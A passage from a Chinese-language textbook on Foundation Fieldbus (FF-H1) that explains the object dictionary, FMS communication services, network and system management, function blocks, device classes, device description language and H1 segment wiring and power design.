6位无符号数,目录号或者名称在对象与对象描述的服务中起关键作用。可以在系统组态过程中规定对象描述,也可在组态完成后的任何时候,在两个站点之间传送。 对象字典(OD)可分为字典头、数据类型、静态条目及动态条目四部分。①字典头。字典头是对象字典中的第一个条目,即目录0或OD描述。它描述了对象字典的概貌,如每组条目的起始序号、每组内的条目数量等。②数据类型。数据类型(DataType)对象指出对象字典中的AP所采用的数据类型,条目1~63作为标准数据类型定义,数据结构定义从对象字典的目录64开始。数据类型不可以远程定义,它们在静态类型字典(ST⁃OD)中有固定的配置,数据类型对象不支持任何服务。③数据结构。数据结构(DataStruct)对象说明记录的结构和大小,它在ST⁃OD中有固定的配置,其元素的数据类型必须使用在ST⁃OD中已定义的数据类型。FF定义的数据结构有:块、值和状态(三种:浮点、数字、位串)、比例尺、模式、访问允许和报警(三种:浮点、数字、总貌)、事件、警示(三种:模拟、数字、更新)、趋势(三种:浮点、数字、位串)、功能块链接、仿真(三种:浮点、数字、位串)、测试、作用等。④静态条目。对象字典中接下来的一组条目是静态定义的AP对象的内容,或称为静态对象字典。静态定义的AP对象是指那些在AP工作期间不可能被动态建立的对象,静态对象字典中包含了简单变量、数组、记录、域、事件等对象的对象描述。对象字典给每一个对象描述分配一个目录号,除此之外,还可以为下列对象,如域(Domain)、程序调用(Pro⁃gramInvocation)、简单变量(SimpleVariable)、数组(Array)、记录(Record)、变量表(VariableList)、事件(Event)等赋予一个可视字符串名称,名称长度可以为0~32B,这个名称长度的字节数被输入到对象描述的名称长度区。长度为0,表示不存在名称。⑤动态条目。动态条目包括动态变量表列表和动态程序调用表两部分。前者为变量表的对象描述,后者为程序调用的对象描述。动态变量表对象及其对象描述是通过定义变量表(DefineVariableList)服务动态变化的,也可以通过删除变量表(DeleteVariableList)服务删除它,还可对它赋予对象访问权。给每个变量表对象描述分配一个目录号,还可以给它分配一个字符串名称,它所包含的基本信息有:变量访问对象号、变量访问对象的逻辑地址指针和访问权等。3)FMS通信服务。现场总线信息规范子层(FMS)的通信服务,为用户提供各种功能模块在现场总线上通信的标准方法,为每个对象类定义了专门的FMS通信服务。FMS提供联络关系管理服务、变量访问服务、事件服务、域上载/下载服务及程序调用服务等。 ①联络关系管理服务。对虚拟通信关系(VCR)的管理称为联络关系管理,相应的服务有三种:Initiate———开始连接通信关系,是确认性服务,可以采用三种VCR之一;Abort———解除已连接通信关系,是非确认性服务,可以采用三种VCR之一;Reject———拒绝不正确的服务,是确认性服务,采用客户/服务器型VCR。②变量访问服务。变量访问对象在S⁃D中定义,是不可删除的,这些对象有物理访问对象、简单变量数组、记录、变量表及数据类型对象和数据结构说明对象。简单变量是由其数据类型定义的单个变量,它存放S⁃OD;数组是一结构性的变量,在S⁃OD中静态地存放,它的所有元素都有相同的数据结构;记录是由不同数据类型的简单变量组成的集合,对应一个数据结构定义。变量表是上述变量对象的一个集合,其对象说明包含来自S⁃OD的SimpleVariable、Array、Record的一个索引表。一个变量表可由定义变量表服务创建,或由删除变量表服务删除。物理访问对象描述一个实际字节串的访问入口,它没有明确的OD对象说明,属性是本地地址和长度。③事件服务。事件(Event)是为从设备向另外的设备发送重要报文而定义的,由FMS使用者监测导致事件发生的条件,当条件发生时,该应用程序激活事件通知服务,并由使用者确认。相应的事件服务有:事件通知、确认事件通知、事件条件监测和带有事件类型的事件通知。事件服务采用报告分发型虚拟通信关系,用于报告事件与管理事件处理。④域上载/下载服务。域(Domain)即一部分存储区,可包含程序和数据,它是字节串类型。域的最大字节数在OD中定义,属性有名称、数字标识、口令、访问组、访问权限、本地地址和域状态等。与其相应的服务主要是下载和上载。FMS服务容许用户应用在一个远程设备中上载(Upload)或下载(Download)域。Upload指从现场设备中读取数据,Download指向现场设备发送或装入数据。对一些如可编程序控制器等功能和结构较为复杂的设备来说,往往需要跨越总线远程上载或下载一些数据与程序。⑤程序调用服务。FMS规范规定了不同种类的对象具有一定的行为规则。一个远程设备能够控制现场总线上的另一设备中的程序状态,程序状态有非活动态、空闲、运行、停止、非运行态等。例如,远程设备可以利用FMS服务中的创建(Create)程序调用,把非存在状态改为空闲状态,也可以利用FMS中的启动(Start)服务把空闲状态改变为运行状态。程序调用服务有PI的创建、删除、启动、恢复、复位和废止。表5⁃4中列出了这类服务的服务名称及服务内容。 4)FMS协议数据单元。FMS协议数据单元由3个字节的固定部分和一个可变长度部分组成。并非所有FMS⁃PDU都需要可变长度部分,固定部分由以下三部分组成:①第一ID信息。表示服务类,例如确认请求、确认响应、确认错误、未确认PDU、拒绝PDU和初始PDU。②InvokeID。一个字节,数据类型为8位整数。③第二ID信息。可更精确地识别PDU。5.1.2网络管理与系统管理1.网络管理(1)网络管理的组成FF⁃H1的每台设备包含一个网络管理代理(NetworkManagementAgents,NMA)和各协议层管理实体(LayerManagementEntities,LME),即FMSLME、FASLME、DLLLME和PHYLME。FF⁃H1的网络管理主要由网络管理者(NetworkManager,NMgr)、网络管理代理(NetworkManagementAgents,NMA)和网络管理信息库(NetworkManagementInformationBase,NMIB)三部分组成。1)网络管理者(NMgr)。网络管理者按系统管理者的规定,负责维护网络运行任务。网络管理者监视每个设备中通信栈的状态,在系统运行需要或系统管理者指示时,执行某个动作。网络管理者通过处理由网络管理代理生成的报告来完成其任务,它指挥网络管理代理,通过FMS来执行它所要求的任务。一个设备内部网络管理与系统管理的相互作用属本地行为,但网络管理者与系统管理者之间的关系,则涉及系统构成。2)网络管理代理(NMA)。每个设备都有一个网络管理代理负责管理其通信栈,通过网络管理代理支持组态管理、运行管理和监视判断通信差错。网络管理代理利用组态管理设置通信栈内的参数,选择工作方式与内容,监视判断有无通信差错。在工作期间,它可以观察、分析设备的通信状况,如果判断出有问题,需要改进或改变设备间的通信,就可以在设备一直工作的同时实现重新组态,是否重新组态则取决于它与其他设备间的通信是否发生中断。尽管实际上组态信息、运行信息、出错信息大部分驻留在通信栈内,但都包含在网络管理信息库NMIB中。3)网络管理信息库(NMIB)。网络管理信息库是网络管理的重要组成部分之一,它是被管理变量的集合,包含了设备通信系统中组态、运行、差错管理的相关信息。网络管理信息库(NMIB)与系统管理信息库(SMIB)结合在一起,成为设备内部访问管理信息的中心,网络管理信息库的内容是借助虚拟现场设备管理和对象字典来描述的。(2)网络管理代理的虚拟现场设备(NMAVFD)网络管理代理的虚拟现场设备是网络上可以看到的网络管理代理,或者说是由FMS看到的网络管理代理。NMAVFD运用FMS服务,使得NMA可以穿越网络进行访问。NMAVFD的属性有厂商名称、模块名称、版本号、行规号、逻辑状态、物理状态及VFD专有对象表,前三个属性由制造商规定并输入,NMAVFD的行规号为0x4D47,即网络管理英文字头M.G的代码,逻辑状态、物理状态用于网络运行的动态数据,VFD专有对象是指NMA索引对象,NMA索引对象是NMIB中对象的逻辑映射,它作为一个FMS数组对象定义。(3)访问网络管理对象的FMS服务访问不同的网络管理对象使用各自相应的FMS服务:NMAVFD的属性由FMSIdentify服务读取;NMAVFDOD由GetOD、PutOD访问;NM索引对象及其他具体管理对象支持FMSRead和FMSWrite两种服务访问。(4)通信实体通信实体包含物理层(PHY)、数据链路层(DLL)、现场总线访问子层(FAS)和现场总线信息规范(FMS)层直到用户层,占据了通信模型大部分区域,是通信模型的主要组成部分。设备的通信实体由各层的协议和网络管理代理共同组成,通信栈是其核心。2.系统管理系统管理(SystemManagement,SM)用来协助基金会现场总线系统中各设备的运行。每个设备中都有系统管理实体,该实体由用户应用与系统管理内核(SystemManagementKernel,SMK)组成。系统管理内核(SMK)可看作一种特殊的应用进程(AP),从它位于通信模型的用户层位置可以看出,SM是通过集成多层的协议与功能而完成的。基金会现场总线采用系统管理者/代理者模式(SMgr/SMK),每台设备的系统管理内核(SMK)承担代理者角色,并响应来自系统管理者(SMgr)的指示。SM可以全部包含在一个设备中,也可以分布在多个设备之间。SM包含系统管理内核(SMK)、系统管理内核协议(SMKP)、系统管理信息库(SMIB)和系统管理服务等。 (1)系统管理内核(SMK)系统管理内核是一个设备管理实体,负责网络的协调和执行功能的同步任务,并是设备具备与网络上其他设备进行互操作的基础。SMK与数据链路层(DLL)有着密切联系,既可以使用某些DLL服务,也可以直接访问DLL,从而执行其功能。这些功能由专门的数据链路服务访问点(DLSAP)提供,DLSAP地址保留在DLL中。在设备地址分配过程中,SM与DLSAP相互联系,且它们的界面都是本地生成的。现场设备中的SMK在网络上完全发挥作用之前,一般要经过3个主要状态:未初始化状态、初始化状态和系统管理运行状态。 1)未初始化状态(Uninitialized)。在该状态下,设备既没有物理设备位号也没有分配的节点地址,只能通过系统管理来访问设备,这种状态下只允许系统管理功能来识别设备以及为设备分配物理设备位号。2)初始化状态(Initialized)。该状态下设备有正确的物理设备位号,但未被分配节点地址,准备采用默认的系统管理节点地址使设备挂接到网络上。这种状态下,SMK除了系统管理服务之外不提供任何其他的服务,而所提供的系统管理服务也只有分配节点地址、消除物理设备位号和识别设备。3)系统管理运行状态(SM⁃Operational)。该状态下设备既有物理设备位号,又有了已分配给它的节点地址,一旦进入这一状态,设备的网络管理代理便启动应用层协议,允许跨越网络进行通信。为了使设备完全可操作,可能需要进一步的网络管理组态和应用组态。(2)系统管理信息库(SMIB)系统管理信息库的特点如下:1)系统管理信息库的主要组态和操作参数。把控制系统管理操作的信息组织成对象存储起来,即形成系统管理信息库(SMIB)。每台设备的系统管理内核(SMK)中只有一个系统管理信息库,SMIB包含了基金会现场总线系统的以下主要组态和操作参数:①设备ID。每一台设备有唯一的设备标识,由制造商设置。②设备物理位号。该位号由用户分配,以标明系统中现场设备的作用。③虚拟现场设备表。该列表为每一个所支持的虚拟现场设备提供注释和名称。④时间对象。该对象包含了当前应用时钟时间和它的分配参数。⑤调度对象。该对象包含了设备中各任务(功能块)间协调合作的调度信息。⑥组态方式/状态。该对象包含了支配系统管理状态的状态和控制标记。2)系统管理信息库的访问。SMIB包含系统管理对象。从网络角度来看,SMIB可看作虚拟现场设备管理FMS提供对它的远程应用访问服务,以进行诊断和组态,同时,运用FMS应用层服务,如读、写等来访问SMIB对象。VFD管理与设备的网络管理代理共享,它也提供对网络管理代理NMA对象的访问,SMIB中包含有网络可视的SMK信息。(3)现场总线装置管理基金会现场总线装置管理分为现场设备地址管理、寻址位号管理和设备识别。 1)设备地址管理。每个现场总线设备都必须有唯一的网络地址和物理设备位号,以便现场总线有可能对它们实行操作。为了避免在仪表中设置地址开关,这里通过系统管理自动实现网络地址分配。为一个新设备分配网络地址的步骤如下:首先,通过组态设备分配给这个新设备一个物理设备位号,这个工作可以“离线”实现,也可以通过特殊的默认网络地址“在线”实现;其次,系统管理采用默认网络地址询问该设备的物理设备位号,并采用该物理设备位号在组态表内寻找新的网络地址;最后,系统管理给该设备发送一个特殊的地址设置信息,使这个设备得到这个新的网络地址。对进入网络的所有的设备都按默认地址重复上述步骤。2)寻址位号管理。系统管理通过寻找位号服务搜索设备或变量,为主机系统和便携式维护设备提供方便。系统管理对所有的现场总线设备广播这一位号查询信息,一旦收到这个信息,每个设备都将搜索它的虚拟现场设备(VFD),看是否符合该位号。如果发现这个位号,就返回完整的路径信息,包括网络地址、VFD编号、虚拟通信关系(VCR)目录和对象字典(OD)目录,主机或维护设备一旦知道了这个路径,就能访问该位号的数据。寻找位号服务査找的对象包括物理位号、功能块(参数)及VFD,使用FIND_TAG_QUERY服务发出査找请求,使用FIND_TAG_REPLY服务做出响应。它们是确认性服务。3)设备识别。现场总线网络的设备识别通过物理设备位号和设备ID来进行。SMK的识别服务容许应用进程从远程SMK得到物理设备位号和设备标识ID。设备ID是一个与系统无关的识别标志,它由生产者提供。在地址分配中,组态主设备也采用这个服务去辨认已经具有位号的设备,并为这个设备分配一个更改的地址。(4)功能块管理系统管理内核(SMK)代理的功能块调度功能,运用存储于系统管理信息库(SMIB)中的功能块调度,告知用户应该执行的功能块或其他可调度的应用任务。SMK使用SMIB中的调度对象和由数据链路层(DLL)保留的链路调度时间来决定何时向它的用户应用发布命令。功能块调度的作用是保证同一链路上的各功能块既可以协调动作,又可以与链路活动调度器(LAS)控制及调度的数据传输同步,另外还能保证应用的执行和应用间数据的传输同步。功能块调度的前提是总线段上的LAS以及支持功能块调度的设备分别建立了各自的周期性调度。功能块的执行是可重复的,每次重复称为一个宏周期(Macrocycle),宏周期通过使用值为零的链路调度时间作为它们起始时间的基准而实现链路时间同步,也就是说,如果一个特定的宏周期生命周期是1000,那么它将以0、1000、2000等时间点作为起始点。假定调度组建工具已经为某个控制回路组建了调度表,见表5⁃5。该调度表包含有开始时间,这个开始时间是指它偏离绝对链路调度开始时间起点的数值,绝对链路调度开始时间是总线上所有设备都知道的。 图5⁃12描述了链路调度循环周期、功能块调度、相对链路调度起点的时间偏离值之间的关系,同时说明了变送器、调节阀和LAS宏周期(120)内功能块调度执行顺序。 1)在偏离值为0的时刻,变送器中的系统管理将引发AI功能块的执行。2)在偏离值为20的时刻,链路活动调度器将向变送器内的AI功能块的缓冲器发出一个强制数据(CD),缓冲器中的数据将发布到总线上。3)在偏离值为30的时刻,调节阀中的系统管理将引发PID功能块的执行。4)在偏离值为50的时刻,执行AO功能块。控制回路将准确地重复这种模式。直到一个周期中4种调度工作完毕,下一个周期再重复上述调度模式,如此周而复始地重复执行功能块调度。在功能块执行的间隙,链路活动调度器还向所有现场设备发送令牌信息,以便它们可以发送各自的非调度信息,如改变给定值、报警通知等。图5⁃12中只有偏离值从20~30,即当AI功能块数据正在总线上发布的时间段不能传送非受调度信息外,其他时间段都可以传送非受调度信息。(5)应用时间管理基金会现场总线支持应用时钟分配功能。系统管理者(SMgr)有一个时间发布器,它向所有的现场总线设备周期性地发布应用时钟同步信号。数据链路调度时间与应用时钟一起被采样、传送,使得正在接收的设备有可能调整它们的本地时间,应用时钟同步允许设备通过现场总线校准带时间标志的数据。3.FF应用模块基金会现场总线把现场设备的硬件和软件功能抽象成用户应用模块,这样便于用户应用这些模块。现场总线设备的功能块与DCS中使用的功能块或算法是相似的,它们由不同的功能和算法的子程序组成,用于完成特定功能的运算。不同的模块表达了不同类型的应用功能,现场总线设备中的模块可分为3种类型,即功能块、资源块和变换块,它们位于现场总线设备通信模型中的最高层———用户层。应用模块用于作为现场总线设备与生产过程的界面,构成自动控制回路,完成自动化系统任务,这才是基金会现场总线的最终目的,也是它与一般通信总线的区别所在。图5⁃13显示了用户层与生产过程界面、通信系统界面的关系。 (1)块对象块对象是资源块、功能块和变换块的统称,为了说明它们的通用特性以及它们之间的连接,FF⁃H1定义了块对象的形式模型,该模型由参数、算法和事件三大要素组成。参数分为输入、输出和内含参数三种,其中内含参数规定块的专有数据,用于算法执行;输入和输出参数用于块与块之间的连接;算法实现块的功能,可以按时间反复执行,或按事件发生重复工作。1)块参数的分类。根据块参数的用途,可以分为以下三类: ①输入参数。该参数值取自另一个功能块的输出参数,即输入参数连接到另一个功能块的输出参数,如果输入参数不与输出参数相连,那么将会被视为一个常数,该值可以由接口设备或临时设备写入。②输出参数。该参数是由输入参数、内含参数经块算法计算的结果,可以和一个或多个功能块的输入参数连接。输出参数包含值和状态,状态说明参数值的品质。③内含参数。该参数是一些组态参数,由操作员和高层设备设置或通过计算设置,它不和其他功能块参数连接。FF⁃H1规范已经将块参数标准化,定义为通用参数(6个通用参数分别为:ST_REV、TAG_DESC、STRATEGY、ALERT_KEY、MODE_BLK、BLOCK_ERR)、功能块参数、设备参数和设备制造商定义的特殊参数。2)块模式(MODE_BLK)。块模式是所有块都有的重要参数,它决定块运行的状态,也能反映块应用的一些错误。块模式分为目标、现实、允许、正常和保留目标5种模式。①目标是操作员选择功能块的目标模式,在所允许选择的模式中只能选一个。②现实,即现行的功能块模式,在某些运行条件或组态下,如输入状态环(输入状态可能是好、不确定或坏)或旁路也可能和目标模式不一致。现实模式是功能块执行模式计算的结果,操作员不能选择。③允许,即允许功能块使用的模式种类,它可以基于应用的需要由用户来组态,所以这像一个从支持的模式中选择出的模式列表。④正常,仅用于记忆功能块正常运行条件下的模式,它不影响功能块计算。⑤保留目标模式,当目标模式是Rcas、Rout、MAN和OOS时,目标模式属性可能保留以前目标模式的有关信息,这个信息可能用于功能块模式脱落和设定值跟踪,这个特性是可选的,并由接口设备完成。3)块连接。块连接是指一个块的输出参数端连接到另一个块的输入参数端。资源块和变换块只有内含参数,无输入、输出参数,所以不支持块的连接。功能块不仅有内含参数,也有输入、输出参数,所以支持块的连接。功能块输入、输出、控制和运算等类别中,每类又有多种块。功能块连接的目的是构成功能块的应用或控制回路,例如用AI块、PID块和AO块连接构成单回路PID控制,这些功能块分布在一台或多台现场设备中,如图5⁃14所示,应用A功能块分布在设备1、2、3中,应用B功能块分布在设备3、4中,应用C的功能块仅在设备2中。 根据功能块的输入、输出参数之间的连接关系,可以分为正向连接和反向连接。①正向连接。该连接是从前一个功能块的输出参数端连接到后一个功能块的输入参数端,例如从输入块到控制块、从一个控制块到另一个控制块、从控制块到输出块。如图5⁃15所示,AI块的OUT连接到PID块的IN、PID块的OUT连接到AO块的CAS_IN均属于正向连接。 ②反向连接。该连接是从后一个功能块的输出参数端连接到前一个功能块的输入参数端,例如从输出块到控制块、从一个控制块到另一个控制块。反向连接保证了块的模式或工作方式改变时,块之间连接的输入和输出参数之间的无扰动切换。图5⁃15中AO块的BKCAL_OUT连接到PID块的BKCAL_IN属于反向连接。(2)功能块(FunctionBlock)参数、算法和事件完整地组成了功能块,功能块描述了现场设备的控制和运算功能。通过对输入、控制、运算、输出功能块的连接组态,可构成自动控制回路,实现控制策略,最终完成系统的自控任务。功能块的构成要素有输入参数、输出参数、算法、内含参数、输入事件和输出事件。功能块类型决定了功能块的构成要素,如输入块只有输出参数,输出块只有输入参数,输入输出参数实现块与块之间的连接,内含参数只能被访问,不能用于连接等。(3)资源块(ResourceBlock)资源块表达了现场设备的硬件和软件对象及其相关运行参数,描述了现场总线设备的特征,如设备名、制造者和系列号等。一台设备只有一个资源块,为了使资源块能表达设备特性,规定了一组参数,而且这些参数全是内含参数,所以资源块没有输入或输出参数。(4)转换块(TransducerBlock)转换块读取传感器中的硬件数据,并将其写入相应的要接收这一数据的硬件中。允许转换块按所要求的频率从传感器中取得数据,并确保合适地写入到要读取数据的硬件之中,它不含有运用该数据的功能块,这样便于把读取数据、写入的过程从制造商的专有物理I/O特性中分离出来,提供功能块的设备入口,并执行一些功能。因此,转换块是用户层的功能块与设备硬件输入、输出之间的接口,它主要完成输入、输出数据的量程转换和线性化处理等任务。以下说明功能块应用进程的对象分类。1)链接对象。链接对象(LinkObject)提供资源和通过现场总线交换的信息之间的映射,用于访问、分配、交换对象的虚拟通信关系(VCR)、某功能块输入参数和另一功能块输出参数的关联等。 链接对象识别块的参数、趋势对象、事件和定义如何交换数据的通信特征,通过在总线组态时定义现场设备和接口设备之间的链接,在现场设备在线运行前或运行时传送给它,就可以访问警告和趋势对象,并把它们送往不同的设备中处理。2)设备资源。功能块应用进程的虚拟现场设备(VFD)称作资源,它表示该应用进程的网络可访问的软件、硬件对象。设备资源构成功能块应用的网络连接,提供用FMS传送服务请求/响应的信息,组成资源的对象定义包含在对象字典中,由FMS和功能块应用共享。通过资源可以访问对象及其参数,每个资源有唯一的资源块。3)警告对象。警告对象用于块的报警和事件报告。报警对象的子目录有块目录、警键(AlertKey)、标准类型(1,LO;2,HI;3,LO_LO;4,HI_HI等)、信息类型(1,事件通知;3,警报发生等)、优先权和时间戳等。警告分作3个子类:模拟警告、离散警告及更新警告,子类属性值从相应的报警或事件参数中复制而得,映射为FMS记录,它们在对象字典中数据结构的目录号分别为75、76和77。4)趋势对象。趋势对象对功能块的趋势性参数进行采样,并对历史采样值短期存储,以便接口设备收集这些信息。趋势对象包含最近6个采样值及其状态,以及最后一次采样的时间,另外,趋势对象还包含有块目录、趋势参数、相对目录、采样类型及间隔等属性。趋势有3个子类,浮点趋势、离散趋势、位串趋势,分别对应数据结构目录号78、79和80,映射为FMS记录。5)观测对象。观测对象(ViewObject)提供对组态和操作的可视性,以便支持功能块的管理和控制,它主要用于获得运行、诊断和组态的信息,在观测对象中定义的块参数分为以下四类:①动态操作参数(View_1)———访问动态操作参数值。②静态操作参数(View_2)———访问静态操作参数值。③完全动态参数(View_3)———访问所有动态参数值。④其他静态参数(View_4)———访问其他静态参数值。6)程序调用对象。采用程序调用对象把具有代码和数据的域组合到可执行的程序中,程序调用模型提供将域连接到程序的服务,并启动、停止和删除该程序。7)域对象。域是一部分物理内存区的程序和数据,其数据类型为Domain,与资源的软件成分有关的程序和数据可以利用域对象进行访问。域对象支持下载/上载服务,把客户端数据装入服务器域和把服务器域数据发送到客户端。8)动作对象。动作对象用于创建或刪除一个块或对象,动作对象的子目录有作用(0,无作用请求;1,创建块或对象;2,删除一个块或对象)、对象的DDMemberID、对象在对象字典中的位置序号。动作对象的值可由FB_Action服务写入,它映射为FMS记录,含3个元素,其数据结构目录号为86。5.1.3设备信息文件1.现场总线设备的定义FF总线设备由通信行规与设备行规规定,不同类别的设备有不同的通信能力的要求。通信行规与设备行规给出了基金会现场总线设备中互相操作性特征与选项的详细说明,它规定了一个设备能与其他设备进行互操作所应具备的最小要求,因而每个设备都必须满足行规中规定的起码要求。通信行规说明了设备在网络工作方面的能力、详细的通信功能。设备行规详细地说明了这个设备的用途,并说明设备的应用要求。现场总线基金会为设计标准的流量、压力、温度、液位变送器和阀门分别制定了规范。基金会现场总线将设备定义为五类:智能I/O设备类、显示控制设备类、临时设备类、接口设备类和过往设备类。(1)智能I/O设备类(101类)智能I/O设备为输入或输出数据的智能设备,它支持功能模块应用过程和系统或网络管理代理功能,如现场变送控制器、调节阀。按FF通信行规规定,智能I/O类设备可能具有的应用过程为:通过系统管理服务,自动地被分配到现场总线上的地址;事件报告;报警确认;趋势报告;支持对可访问参数值的读写服务功能;向其他设备发布输出参数值的发布者功能;接收发布参数值的预定接收功能;支持对系统管理信息库(SMIB)读写的系统管理代理功能;支持对网络管理信息库(NMIB)读写的网络管理代理功能;支持远地位号查询;静态创建具有一个或多个变换块及功能块的应用进程;功能块服务。(2)显示控制设备类(102类)显示控制设备指的是传统的控制室架装仪表类,如控制器、显示和记录仪等,它一般比智能I/O设备类要复杂。在许多场合都要求它们具有链路管理功能,这类设备可能的应用进程比101类多,除了上述101类的所有可能应用过程之外,其可能的应用过程还有:支持VCR的读取和装载;设备地址分配;客户请求能力;作为基本参数读写访问的客户,支持功能块参数装载;事件、报警的接收与确认。(3)临时设备类(103类)临时设备是在网络启动或维护时,暂时挂接在网络上的设备。可以用它来规定组态参数值,为通信、网络管理、系统管理和功能块实行组态,当在线操作中要进行调整或设备启动时,也会要求有这类组态设备。这类设备可能具有的应用过程包括设备地址的访问者;客户请求能力;作为基本参数读写访问的客户,支持功能块参数装载;系统管理者,支持对设备位号、设备地址的识别,功能模块寻找等;网络管理者,支持VCR的选取和装载;设备地址分配。由于它随时可能被断开,为了不妨碍通信,它不应该成为链路主管。(4)接口设备类(104类)接口设备是和其他系统或网络的接口,这类设备可能的应用过程与102类相同,区别在于102类设备要拥有所有的必要功能,而104类设备的功能是可选的。104类设备提供了通信功能的模块结构,可以根据设备的应用过程对其通信功能模块进行选择。这些模块是:作为链路主管的通信功能LM;作为系统管理者的功能SMgr(SMKP初始化作用与客户角色);运用系统管理内核协议的应用时间发布者TM;作为系统管理的功能SM(SMKP响应者角色与服务器角色);作为客户角色通信功能;作为服务器角色的通信功能;作为发布者角色的通信功能;作为预定接收者的通信功能SUB;作为报告源角色的的通信功能;作为报告接收角色的通信功能。(5)过往设备类(001类)过往设备的基本特征是无设备地址,没有产生信号帧的功能,也称为网络辅助设备。这类设备主要指捕捉通信包、分析总线运行状况的总线分析仪,还有终端器、中继器、电源和安全栅等。2.设备描述(1)设备描述设备描述(DD)是基金会现场总线为实现可互操作性而提供的一个重要工具。由于要求同一总线上现场总线设备具有互操作性,必须使功能块参数与性能规定标准化,同时它也为用户和制造商加入新的块或参数提供了条件。每种设备都有对应的DD,即设备制造商在供应物理设备的同时,还必须提供对应的设备描述。DD为虚拟现场设备中的每个对象提供了扩展描述,DD内包括参数标签、工作单位、要显示的十进制数、参数关系、量程和诊断菜单等。(2)设备描述层FF设备参数分层如图5⁃16所示。分层中的第一层为通用参数,通用参数指那些公共属性参数,如标签、版本和模式等,所有的块都必须包含通用参数。 第二层为功能块参数,该层为标准功能块规定了参数,也为标准资源块规定了参数。第三层为变换模块参数,该层为标准变换模块定义了参数,在某些情况下,变换块规范也可能为标准功能块规定参数。现场总线基金会已经为前三层编写了设备描述,形成了标准的现场总线基金会设备描述。第四层为制造商专用参数,在这个层次上,每个制造商都可以自由地为功能块和变换块增置他们自己的参数,这些新增置的参数应该包含在附加DD中。3.设备描述信息文件设备描述信息文件由设备描述语言(DDL)的一些基本结构件组成。每个结构件有一组相应的属性,属性可以是静态的,也可以是动态的,它随参数值的改变而改变。(1)设备描述语言现场总线基金会规定的DDL是一种程序语言,用它描述通过现场总线接口可访问的信息。DDL是可读的结构文本语言,表示一个现场设备如何与主机及其他现场设备相互作用。现场总线基金会规定的DDL共有16种基本结构,它们是:块(Blocks),描述一个块的外部特性;变量(Variables)、记录(Records)、数组(Arrays),分别描述设备包含的数据;菜单(Menus)、编辑显示(EditDisplays),提供人机界面支持方法,描述主机如何提供数据;方法(Methods),描述主机应用与现场设备间发生相互作用的复杂序列的处理过程;单元关系(UnitRelations)、刷新关系(RefreshRelations)及整体写入关系(Waite_as_oneRelations),描述变量、记录、数组间的相互关系;变量表(Vari⁃ableLists),按成组特性描述设备的逻辑分组;项目数组(ItemArrays)、数集(Collec⁃tions),描述数据的逻辑分组;程序(Programs),说明主机如何激活设备的可执行代码;域(Domains),用于从现场设备上载或向现场设备下载大量的数据;响应代码(ResponseCodes),说明一个变量、记录、数组、变量表、程序或域的具体应用响应代码。DDL系统结构的组成如图5⁃17所示,该系统主要由两个规范和两个工具组成,其中两个规范分别为DDL规范和DDL二进制编码规范,两个工具分别为DDL编译器和DD服务器(DDServer)。 用DDL来描述设备是设备制造商的第一步工作,该语言不仅要描述FF⁃H1为功能块及参数定义的标准集,同时要描述为用户组和制造商定义的专用集。(2)DDL编译器DDL编译器(Tokenizer)将用DDL编写的DDL源文件转换成二进制格式文件,并对DDL源文件中的差错进行校验。差错校验有利于加强设备的互操作性和一致性,例如,对制造商的设备的描述,可以引用现场总线基金会的核心设备描述、集团用户设备类型的设备描述和制造商的专有设备描述。对这个最终的设备描述进行编译时,编译器的差错校验,可能会发现这三个设备描述源文件之间的不一致性。上述措施都可以提高DDL源文件的编写质量,同时能确保功能上的一致性,最终保证了设备的互操作性。5.2FF应用5.2.1FF网络设计由于控制网络的数字化通信特征,使得现场总线控制系统的布线、安装与传统的模拟控制系统有很大区别。一条双绞线上挂接多个现场设备,对布线和安装有许多新的要求,具有新的特点。1.H1网段的构成图5⁃18所示为基本H1网段的构成。在该网段中,有作为链路主管的主设备、现场基本设备、总线供电电源、电源调理器、连接在网段两端的终端器、布线连接用的电缆、连接器或连接端子。网段上连接的现场设备有两种:①总线供电式现场设备,它需要从总线上获取工作电源,总线供电电源就是为这种设备准备的;②单独供电式现场设备,它不需要从总线上获取其工作电源。 FF规定了几种型号的总线供电电源,131型为给安全栅供电的非本安电源,133型为推荐使用的本安电源,132型为普通非本安电源,输出电压最大值为直流32V。按照规范要求,现场设备从总线上得到的电源不能低于直流9V,以保证现场设备的正常工作。H1网段的供电电源需要通过一个电阻———电感式阻抗匹配电路,即电源调理器连接到网络上。电源调理器可以单独存在,也可将它嵌入到总线电源之中。在有本质安全防爆要求的危险场所,现场总线网段还应该配有本质安全防爆栅。图5⁃19所示为H1的本安网段示例,这种齐纳式安全栅将向危险区送入的电压控制在一定的范围之内,例如±11V,网段的连接应保证每个现场设备从总线上得到大于9V的工作电压,另外还有一种单独供电式隔离型安全栅。 终端器连接在总线两端的末端或末端附近,其作用是防止发生信号波的反射。终端器电阻的阻值应该等于该导线的特征阻抗,特征阻抗随着导线的直径、与电缆中其他导线的相对间距、导线的绝缘类型的变化而变化,与导线的长度无关。电缆制造厂商可以提供导线的特征阻抗值,例如24AWG双绞线电缆的特征阻抗为100~150Ω。终端器的阻值等于导线的特征阻抗时,因反射引起的信号失真最小,大于或小于特征阻抗值的终端器都会因反射而加大信号畸变,采用终端器的主要目的是要用导线的特征阻抗来终止传输导线。H1网段采用的终端器由一个1μF的电容与一个100Ω的电阻串联构成。每个总线段的两端各需要一个终端器,而且每一端只能有一个终端器,可采用单独的终端器。有时,也将终端器电路内置在电源、安全栅、PC接口卡、端子排内。在安装前要了解清楚某个设备内是否已有终端器,避免重复使用,影响网段上的数据传输。现场总线可使用多种型号的电缆,表5⁃6中列出了A、B、C、D这4种电缆可供选用,其中A型为新安装系统中推荐使用的电缆。其次推荐使用的现场总线电缆是多股双绞线对、外层全屏蔽的,即B型电缆。当同一地区有多条现场总线时,在新的安装过程中适于选用这种类型的电缆,或者将它用于改造工程中。另一种推荐使用的是未加屏蔽的单对或多股双绞线的电缆,即C型电缆。最后一种是没有双绞的,但外层全屏蔽的多芯电缆,即D型电缆。C、D两种电缆主要应用于改造工程中。相对A、B而言,C、D在使用长度上有些限制,在某些特定场合中,要避免使用C、D两种电缆。其他类型的电缆也可在现场总线系统中使用。 